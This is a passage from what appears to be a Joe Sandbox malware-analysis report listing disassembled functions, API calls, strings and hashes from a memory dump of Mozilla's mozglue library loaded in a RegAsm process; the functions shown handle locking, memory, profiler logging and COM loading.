                                                                                    • Instruction Fuzzy Hash: AA517C35B006008FCB15DF59C494A6ABBF5FF89318B6A856DE99A8B355C731FC01CB84
                                                                                    Function 6C711D00 Relevance: 10.6, APIs: 7, Instructions: 115threadCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C711D0F
                                                                                    • AcquireSRWLockExclusive.KERNEL32(?,?,6C711BE3,?,?,6C711D96,00000000), ref: 6C711D18
                                                                                    • ReleaseSRWLockExclusive.KERNEL32(?,?,6C711BE3,?,?,6C711D96,00000000), ref: 6C711D4C
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C711DB7
                                                                                    • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C711DC0
                                                                                    • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C711DDA
                                                                                      • Part of subcall function 6C711EF0: GetCurrentThreadId.KERNEL32 ref: 6C711F03
                                                                                      • Part of subcall function 6C711EF0: AcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,6C711DF2,00000000,00000000), ref: 6C711F0C
                                                                                      • Part of subcall function 6C711EF0: ReleaseSRWLockExclusive.KERNEL32 ref: 6C711F20
                                                                                    • moz_xmalloc.MOZGLUE(00000008,00000000,00000000), ref: 6C711DF4
                                                                                      • Part of subcall function 6C6DCA10: malloc.MOZGLUE(?), ref: 6C6DCA26
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: ExclusiveLock$AcquireCurrentReleaseThread$mallocmoz_xmalloc
                                                                                    • String ID:
                                                                                    • API String ID: 1880959753-0
                                                                                    • Opcode ID: dce0d660aa7cf61c1e7fe869de962b55becd7c775879ee81b3006709fec8744b
                                                                                    • Instruction ID: 19d0c80018a1cec75fdb271be39c853741140db1b6a3cb505ea14b4c40b292b2
                                                                                    • Opcode Fuzzy Hash: dce0d660aa7cf61c1e7fe869de962b55becd7c775879ee81b3006709fec8744b
                                                                                    • Instruction Fuzzy Hash: ED41ABB52007049FCB10DF29C589A5ABBF9FF89318F14846EE99A87B41CB31F814CB95
                                                                                    Function 6C6D38A0 Relevance: 10.6, APIs: 7, Instructions: 80memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • AcquireSRWLockExclusive.KERNEL32(6C74E220,?,?,?,?,6C6D3899,?), ref: 6C6D38B2
                                                                                    • ReleaseSRWLockExclusive.KERNEL32(6C74E220,?,?,?,6C6D3899,?), ref: 6C6D38C3
                                                                                    • free.MOZGLUE(00000000,?,?,?,6C6D3899,?), ref: 6C6D38F1
                                                                                    • RtlFreeHeap.NTDLL(?,00000000,?), ref: 6C6D3920
                                                                                    • RtlFreeUnicodeString.NTDLL(-0000000C,?,?,?,6C6D3899,?), ref: 6C6D392F
                                                                                    • RtlFreeUnicodeString.NTDLL(-00000014,?,?,?,6C6D3899,?), ref: 6C6D3943
                                                                                    • RtlFreeHeap.NTDLL(?,00000000,0000002C), ref: 6C6D396E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: Free$ExclusiveHeapLockStringUnicode$AcquireReleasefree
                                                                                    • String ID:
                                                                                    • API String ID: 3047341122-0
                                                                                    • Opcode ID: 0bd0a39343a1edfa7743662994ed9f2768b056354554fba5e09a40f076c8aee1
                                                                                    • Instruction ID: 5edecf8cec15e14491ec45a02d681daac6e19e63ec10e67f0955ca7708f5dfff
                                                                                    • Opcode Fuzzy Hash: 0bd0a39343a1edfa7743662994ed9f2768b056354554fba5e09a40f076c8aee1
                                                                                    • Instruction Fuzzy Hash: 83210276600B20DFD720DF25C884B96B7B9EF45328F168439D95A9BB11D730F885CB94
                                                                                    Function 6C7084E0 Relevance: 10.6, APIs: 7, Instructions: 79COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C7084F3
                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C70850A
                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C70851E
                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C70855B
                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C70856F
                                                                                    • ??1UniqueJSONStrings@baseprofiler@mozilla@@QAE@XZ.MOZGLUE(?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C7085AC
                                                                                      • Part of subcall function 6C707670: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,6C7085B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C70767F
                                                                                      • Part of subcall function 6C707670: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,6C7085B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C707693
                                                                                      • Part of subcall function 6C707670: free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,6C7085B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C7076A7
                                                                                    • free.MOZGLUE(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C7085B2
                                                                                      • Part of subcall function 6C6E5E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C6E5EDB
                                                                                      • Part of subcall function 6C6E5E90: memset.VCRUNTIME140(ewrl,000000E5,?), ref: 6C6E5F27
                                                                                      • Part of subcall function 6C6E5E90: LeaveCriticalSection.KERNEL32(?), ref: 6C6E5FB2
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: free$CriticalSection$EnterLeaveStrings@baseprofiler@mozilla@@Uniquememset
                                                                                    • String ID:
                                                                                    • API String ID: 2666944752-0
                                                                                    • Opcode ID: b5f604e0d03d8b54e61bd7a9084756e42979462699865d080a0d27677568a879
                                                                                    • Instruction ID: c4338c71961ddc4ac823c15c00fefc74d170c0cd4011d736d3983bfeb5c444a4
                                                                                    • Opcode Fuzzy Hash: b5f604e0d03d8b54e61bd7a9084756e42979462699865d080a0d27677568a879
                                                                                    • Instruction Fuzzy Hash: FC216DB43006019FDB14DB24C988A6AB7F5AF4530DF24483DE55B87B41EB31E948CB51
                                                                                    Function 6C6D1640 Relevance: 10.6, APIs: 7, Instructions: 77COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • memset.VCRUNTIME140(?,00000000,00000114), ref: 6C6D1699
                                                                                    • VerSetConditionMask.NTDLL ref: 6C6D16CB
                                                                                    • VerSetConditionMask.NTDLL ref: 6C6D16D7
                                                                                    • VerSetConditionMask.NTDLL ref: 6C6D16DE
                                                                                    • VerSetConditionMask.NTDLL ref: 6C6D16E5
                                                                                    • VerSetConditionMask.NTDLL ref: 6C6D16EC
                                                                                    • VerifyVersionInfoW.KERNEL32(?,00000037,00000000), ref: 6C6D16F9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: ConditionMask$InfoVerifyVersionmemset
                                                                                    • String ID:
                                                                                    • API String ID: 375572348-0
                                                                                    • Opcode ID: 901a2e0ee559bceaf4f1b07c48e92f13ad8c3d53f66713923d9148e4efd1e334
                                                                                    • Instruction ID: e083a8925edb5af882d2bce33cb4caf875caafc899fd6ecd6f740fb1d5cf2f6c
                                                                                    • Opcode Fuzzy Hash: 901a2e0ee559bceaf4f1b07c48e92f13ad8c3d53f66713923d9148e4efd1e334
                                                                                    • Instruction Fuzzy Hash: 4B21D5B07402086FEB116A648C49FFBB37CDFC6718F418529F6059B5C1C6B4AD54C6A5
                                                                                    Function 6C71D1D0 Relevance: 10.6, APIs: 7, Instructions: 74threadCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C71D1EC
                                                                                    • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C71D1F5
                                                                                      • Part of subcall function 6C71AD40: moz_malloc_usable_size.MOZGLUE(?), ref: 6C71AE20
                                                                                    • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C71D211
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C71D217
                                                                                    • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C71D226
                                                                                    • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C71D279
                                                                                    • free.MOZGLUE(?), ref: 6C71D2B2
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: ExclusiveLock$AcquireCurrentReleaseThread$freemoz_malloc_usable_size
                                                                                    • String ID:
                                                                                    • API String ID: 3049780610-0
                                                                                    • Opcode ID: ce7e4f1b60e25398961952c565d572ca465339949b72709d2a33a53b805038dc
                                                                                    • Instruction ID: 43878be19f5518990af737cd9aebf6f4a965c350c68dd1400fae24a2f1a17c1a
                                                                                    • Opcode Fuzzy Hash: ce7e4f1b60e25398961952c565d572ca465339949b72709d2a33a53b805038dc
                                                                                    • Instruction Fuzzy Hash: 1E217171604705DBCB05DF65C488A9EB7B5FF8A328F10863EE52687740DB30A809CB95
                                                                                    Function 6C70F5B0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 70threadCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 6C6FCBE8: GetCurrentProcess.KERNEL32(?,6C6C31A7), ref: 6C6FCBF1
                                                                                      • Part of subcall function 6C6FCBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C6C31A7), ref: 6C6FCBFA
                                                                                      • Part of subcall function 6C709420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C6D4A68), ref: 6C70945E
                                                                                      • Part of subcall function 6C709420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C709470
                                                                                      • Part of subcall function 6C709420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C709482
                                                                                      • Part of subcall function 6C709420: __Init_thread_footer.LIBCMT ref: 6C70949F
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C70F619
                                                                                    • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000,?,6C70F598), ref: 6C70F621
                                                                                      • Part of subcall function 6C7094D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C7094EE
                                                                                      • Part of subcall function 6C7094D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C709508
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C70F637
                                                                                    • AcquireSRWLockExclusive.KERNEL32(6C74F4B8,?,?,00000000,?,6C70F598), ref: 6C70F645
                                                                                    • ReleaseSRWLockExclusive.KERNEL32(6C74F4B8,?,?,00000000,?,6C70F598), ref: 6C70F663
                                                                                    Strings
                                                                                    • [D %d/%d] profiler_remove_sampled_counter(%s), xrefs: 6C70F62A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: Currentgetenv$ExclusiveLockProcessThread$AcquireInit_thread_footerReleaseTerminate__acrt_iob_func__stdio_common_vfprintf_getpid
                                                                                    • String ID: [D %d/%d] profiler_remove_sampled_counter(%s)
                                                                                    • API String ID: 1579816589-753366533
                                                                                    • Opcode ID: 4ab6d1b8440fdaa7ebea4e4dc4314071b3bdb0fefb947ca995ce5da44acdbb74
                                                                                    • Instruction ID: 0b65866796d9a2ec97439e6482ad0ddeef060551140e8759cd00541f33fce3a8
                                                                                    • Opcode Fuzzy Hash: 4ab6d1b8440fdaa7ebea4e4dc4314071b3bdb0fefb947ca995ce5da44acdbb74
                                                                                    • Instruction Fuzzy Hash: E21182B5301604ABCB44AF69D6489AA77B9FB8636CF504027EA1587F01CB71AC15CBA4
                                                                                    Function 6C6D2070 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 68libraryloaderCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 6C6FAB89: EnterCriticalSection.KERNEL32(6C74E370,?,?,?,6C6C34DE,6C74F6CC,?,?,?,?,?,?,?,6C6C3284), ref: 6C6FAB94
                                                                                      • Part of subcall function 6C6FAB89: LeaveCriticalSection.KERNEL32(6C74E370,?,6C6C34DE,6C74F6CC,?,?,?,?,?,?,?,6C6C3284,?,?,6C6E56F6), ref: 6C6FABD1
                                                                                    • LoadLibraryW.KERNEL32(combase.dll,6C6D1C5F), ref: 6C6D20AE
                                                                                    • GetProcAddress.KERNEL32(00000000,CoInitializeSecurity), ref: 6C6D20CD
                                                                                    • __Init_thread_footer.LIBCMT ref: 6C6D20E1
                                                                                    • FreeLibrary.KERNEL32 ref: 6C6D2124
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: CriticalLibrarySection$AddressEnterFreeInit_thread_footerLeaveLoadProc
                                                                                    • String ID: CoInitializeSecurity$combase.dll
                                                                                    • API String ID: 4190559335-2476802802
                                                                                    • Opcode ID: 6b9695225293357723bab502bd4343ceefe76122e93ef24fe3bf06593faf39b7
                                                                                    • Instruction ID: 7f80cf8022f81e33bde549a6e9a8c6c90724c822b13c9c179098276a71bcf2c8
                                                                                    • Opcode Fuzzy Hash: 6b9695225293357723bab502bd4343ceefe76122e93ef24fe3bf06593faf39b7
                                                                                    • Instruction Fuzzy Hash: 52218E76200209EFDF11EF55DC48E9A7F7AFB4A369F11C026FA1492610D731A861DF64
                                                                                    Function 6C7276C0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • WideCharToMultiByte.KERNEL32 ref: 6C7276F2
                                                                                    • moz_xmalloc.MOZGLUE(00000001), ref: 6C727705
                                                                                      • Part of subcall function 6C6DCA10: malloc.MOZGLUE(?), ref: 6C6DCA26
                                                                                    • memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6C727717
                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,6C72778F,00000000,00000000,00000000,00000000), ref: 6C727731
                                                                                    • free.MOZGLUE(00000000), ref: 6C727760
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: ByteCharMultiWide$freemallocmemsetmoz_xmalloc
                                                                                    • String ID: }>pl
                                                                                    • API String ID: 2538299546-4259265346
                                                                                    • Opcode ID: ecccafcea50d07453bd2edb813c3a6e69262bb67beb176003738c758561f3fce
                                                                                    • Instruction ID: 04820dbbae77af1c52c4c68b8b8d99a206a0627835a6a0d754c072a0912f923e
                                                                                    • Opcode Fuzzy Hash: ecccafcea50d07453bd2edb813c3a6e69262bb67beb176003738c758561f3fce
                                                                                    • Instruction Fuzzy Hash: 8C11B2B19052256BE710AF7ACD44BABBEF8EF46354F044529F888A7300E774984087E2
                                                                                    Function 6C7099A0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62threadCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 6C709420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C6D4A68), ref: 6C70945E
                                                                                      • Part of subcall function 6C709420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C709470
                                                                                      • Part of subcall function 6C709420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C709482
                                                                                      • Part of subcall function 6C709420: __Init_thread_footer.LIBCMT ref: 6C70949F
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C7099C1
                                                                                    • AcquireSRWLockExclusive.KERNEL32(6C74F4B8), ref: 6C7099CE
                                                                                    • ReleaseSRWLockExclusive.KERNEL32(6C74F4B8), ref: 6C7099F8
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C709A05
                                                                                    • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C709A0D
                                                                                      • Part of subcall function 6C709A60: GetCurrentThreadId.KERNEL32 ref: 6C709A95
                                                                                      • Part of subcall function 6C709A60: _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C709A9D
                                                                                      • Part of subcall function 6C709A60: ?profiler_time@baseprofiler@mozilla@@YANXZ.MOZGLUE ref: 6C709ACC
                                                                                      • Part of subcall function 6C709A60: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C709BA7
                                                                                      • Part of subcall function 6C709A60: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000), ref: 6C709BB8
                                                                                      • Part of subcall function 6C709A60: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000,00000000), ref: 6C709BC9
                                                                                      • Part of subcall function 6C6FCBE8: GetCurrentProcess.KERNEL32(?,6C6C31A7), ref: 6C6FCBF1
                                                                                      • Part of subcall function 6C6FCBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C6C31A7), ref: 6C6FCBFA
                                                                                    Strings
                                                                                    • [I %d/%d] profiler_stream_json_for_this_process, xrefs: 6C709A15
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: Current$ThreadTimegetenv$ExclusiveLockProcessStampV01@@Value@mozilla@@_getpid$?profiler_time@baseprofiler@mozilla@@AcquireInit_thread_footerNow@ReleaseStamp@mozilla@@TerminateV12@_
                                                                                    • String ID: [I %d/%d] profiler_stream_json_for_this_process
                                                                                    • API String ID: 2359002670-141131661
                                                                                    • Opcode ID: ad8e2361ba7b41787ff62c40493b18256dc1ec0cae64d8692735a0524a28c9c5
                                                                                    • Instruction ID: 01f323811ad5c978de7fbd7ad8681a3dfc5f2f6c3784b836d77aa9686e8249ab
                                                                                    • Opcode Fuzzy Hash: ad8e2361ba7b41787ff62c40493b18256dc1ec0cae64d8692735a0524a28c9c5
                                                                                    • Instruction Fuzzy Hash: 9C01C4B5B045249BDB007F6996096BA3BB8EB9326CF04C137FD2553B41DB345C05C7A1
                                                                                    Function 6C6D1FA0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 60libraryloaderCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 6C6FAB89: EnterCriticalSection.KERNEL32(6C74E370,?,?,?,6C6C34DE,6C74F6CC,?,?,?,?,?,?,?,6C6C3284), ref: 6C6FAB94
                                                                                      • Part of subcall function 6C6FAB89: LeaveCriticalSection.KERNEL32(6C74E370,?,6C6C34DE,6C74F6CC,?,?,?,?,?,?,?,6C6C3284,?,?,6C6E56F6), ref: 6C6FABD1
                                                                                    • LoadLibraryW.KERNEL32(combase.dll,?), ref: 6C6D1FDE
                                                                                    • GetProcAddress.KERNEL32(00000000,CoCreateInstance), ref: 6C6D1FFD
                                                                                    • __Init_thread_footer.LIBCMT ref: 6C6D2011
                                                                                    • FreeLibrary.KERNEL32 ref: 6C6D2059
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: CriticalLibrarySection$AddressEnterFreeInit_thread_footerLeaveLoadProc
                                                                                    • String ID: CoCreateInstance$combase.dll
                                                                                    • API String ID: 4190559335-2197658831
                                                                                    • Opcode ID: 4d6fe8abd031200af3084a59da6a7d76f3acbb5a23c2c20b744b89e2be41ff89
                                                                                    • Instruction ID: 43042f923da7226b6c9dbb60091f02d07a00bc6472f9de7ac96acf2f309c6d4d
                                                                                    • Opcode Fuzzy Hash: 4d6fe8abd031200af3084a59da6a7d76f3acbb5a23c2c20b744b89e2be41ff89
                                                                                    • Instruction Fuzzy Hash: D8117975240205AFEF20FF15C948E9ABB79EB8A36DF20C03AE91482640C731AC51CBA4
                                                                                    Function 6C6D0EE0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 51libraryloaderCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 6C6FAB89: EnterCriticalSection.KERNEL32(6C74E370,?,?,?,6C6C34DE,6C74F6CC,?,?,?,?,?,?,?,6C6C3284), ref: 6C6FAB94
                                                                                      • Part of subcall function 6C6FAB89: LeaveCriticalSection.KERNEL32(6C74E370,?,6C6C34DE,6C74F6CC,?,?,?,?,?,?,?,6C6C3284,?,?,6C6E56F6), ref: 6C6FABD1
                                                                                    • LoadLibraryW.KERNEL32(combase.dll,00000000,?,6C6FD9F0,00000000), ref: 6C6D0F1D
                                                                                    • GetProcAddress.KERNEL32(00000000,CoInitializeEx), ref: 6C6D0F3C
                                                                                    • __Init_thread_footer.LIBCMT ref: 6C6D0F50
                                                                                    • FreeLibrary.KERNEL32(?,6C6FD9F0,00000000), ref: 6C6D0F86
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: CriticalLibrarySection$AddressEnterFreeInit_thread_footerLeaveLoadProc
                                                                                    • String ID: CoInitializeEx$combase.dll
                                                                                    • API String ID: 4190559335-2063391169
                                                                                    • Opcode ID: 1c6af8601742f278f5c0b6c26097041632652b13db25b2e3d9d60322ce03444e
                                                                                    • Instruction ID: 03d22900f16c6d23792e86c9c51d647d96d0e017149a9cbba0e009efbd81c8b9
                                                                                    • Opcode Fuzzy Hash: 1c6af8601742f278f5c0b6c26097041632652b13db25b2e3d9d60322ce03444e
